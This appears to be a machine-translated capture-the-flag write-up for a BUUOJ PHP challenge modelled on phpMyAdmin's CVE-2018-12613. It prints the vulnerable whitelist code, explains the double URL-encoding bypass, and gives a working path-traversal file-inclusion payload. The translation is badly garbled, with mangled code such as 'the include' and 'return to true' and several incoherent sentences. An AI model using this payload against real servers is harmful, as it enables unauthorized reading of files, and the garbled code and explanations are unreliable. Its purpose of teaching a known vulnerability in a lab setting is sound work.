BUUOJ Web's first question, in fact, is a question of great quality, but most do not know why become Solved topics, instructors are also jokes that are "discouraging title," This question should be the prototype from phpMyadmin the file contains a vulnerability (CVE-2018-12613)
This article aims to analyze this question involves the disintegration of knowledge and ideas, want to take a direct look at the master WriteUp Flag can see other articles
Problem-solving process
Problem-solving ideas
View source into the title findings suggest that:
Source.php follow up the source code:
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?>
Code view divided into two parts, the first part is the definition of a class emmm checkFile function for checking whether the incoming file parameters Compliance:
class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } }
The second part is the global code program, from where we can get the file contains three conditions:
IF (! empty ( $ _REQUEST [ 'file' ]) && is_string ( $ _REQUEST [ 'file' ]) && emmm :: checkFile ( $ _REQUEST [ 'file']) // used to receive $ _REQUEST file parameter, if file value of the parameter is not empty, a string, by detecting function checkFile emmm class, contains the file ) { the include $ _REQUEST [ 'file' ]; Exit ; } the else { echo "<br> <IMG the src = \" HTTPS: //i.loli.net/2018/11/01/5bdb0d93dc794.jpg \ "/>" ; }
In checkFile function emmm class, we can see the white list there are two files:
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
Hint.php file contains what to try ? /Source.php File = hint.php :
Flag in ffffllllaaaagggg prompt us, then we have the key to solving problems is how to include this file in the outside whitelist
We can see from the second part of the code, the focus is how to make ffffllllaaaagggg by checking checkFile, so we need to start from checkFile function emmm class
Pre-knowledge
We need to advance understanding of the function of several checkFile functions appear before the code reading this function:
1. the in_array () that the specified value of the function search array
More information: https://www.w3school.com.cn/php/func_array_in_array.asp
2. mb_substr () function returns part of a string, before we learned substr () function, it is only for the English characters, if you want to split Chinese character you need to use mb_substr ()
More information: https://www.runoob.com/php/func-string-mb_substr.html
3. mb_strpos () the position of the first occurrence of the search string in another string
More information: https://www.php.net/manual/zh/function.mb-strpos.php
Analysis of the core code
After learning a few small points above the return we look at the core code:
class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { //page必须不为空或为字符串 echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { //Whether the in_array () detects the page in the whitelist return to true ; } $ _page = mb_substr ( // if the page containing the? obtaining a first page and assigns _page variable value before? $ page , 0, mb_strpos ( $ page ., '?' '?' ) ); iF ( the in_array ( $ _page , $ whitelist )) { // detect whether the whitelist _page the return to true ; } $ _page = urldecoded ( $ Page ); // to _page after secondary assignment to equal the URL decoding page _page $ = mb_substr ( $ _page , 0, mb_strpos ( $ _page ,). '?' '?' // _page If so, the? taken _page (page URL after decoding) two intermediate values? ); iF ( the in_array ( $ _page , $ whitelist )) { // detect whether the whitelist _page the return to true ; } echo "See you IT CAN Not" ; return to false ; } }
Logic might look a bit messy, so we comb logic, incorporated herein by Wang sigh analysis of the master:
You can see there are four function code if statement:
The first if statement to test variables, $ page requires a string, otherwise it returns false // returns False so here is useless because
the second if statement to determine whether there is a $ page on $ whitelist array, there is the true return
of the third if statement after the judgment, taken $ $ page is present in the whitelist array, taken in $ page '?' front part, returns true presence
fourth if statement determines url decoded and taken after $ $ page is present in the whitelist , the presence returns true
if the statement were not more than four if the return value, false is returnedThree if statement returns true, the second statement is determined directly $ page, not available
The third statement interception '?' Front part, due to the? Rear section is parsed argument submitted to get way, and do not use
The fourth if statement, to be re-url decoding intercepted, so we can? Twice url encoded on the server side to extract parameters when decoding time, checkFile function once decoded, will decode as '?', Still by the fourth if statement checking.
As long as these four if the statement is true to include a File , the key point returns true after truncated _page.
So our breakthrough lies in fourth if statement, as long as his condition is met, we can include files:
$_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') );
if (in_array($_page, $whitelist)) { return true; }
Here URL decoding a value of $ page, to note here is that, PHP in $ _GET, $ _ POST, $ _ REQUEST these functions in the extraction of decoding a URL parameter value
And here again, URL decoding in the code a total of decoding twice, so we need to pass twice the value of URL encoding
Second point is that we break this code will only be intercepted? Take it before a string compare and whitelist, so just make sure? Is to return value before or hint.php true source.php
Equivalent to /source.php? File = source.php% 253f123456 can use the include () function contains source.php? 123456 This file (% 253f that? Value of the URL-encoded twice)
It is possible to construct Payload:
/index.php?file=source.php?/../../../../ffffllllaaaagggg
Note that, the reason may be included here to ffffllllaaaagggg is because PHP will source.php? / Treated as a folder, and then ../ purpose is to return to parent directory
ffffllllaaaagggg located in the root directory, files are typically Web services folder in / var / www / html directory, plus source.php? / This "folder" ../ so we need a total of four times to return to the root directory
(If the game does not know the specific position of the flag, then the test may be one layer)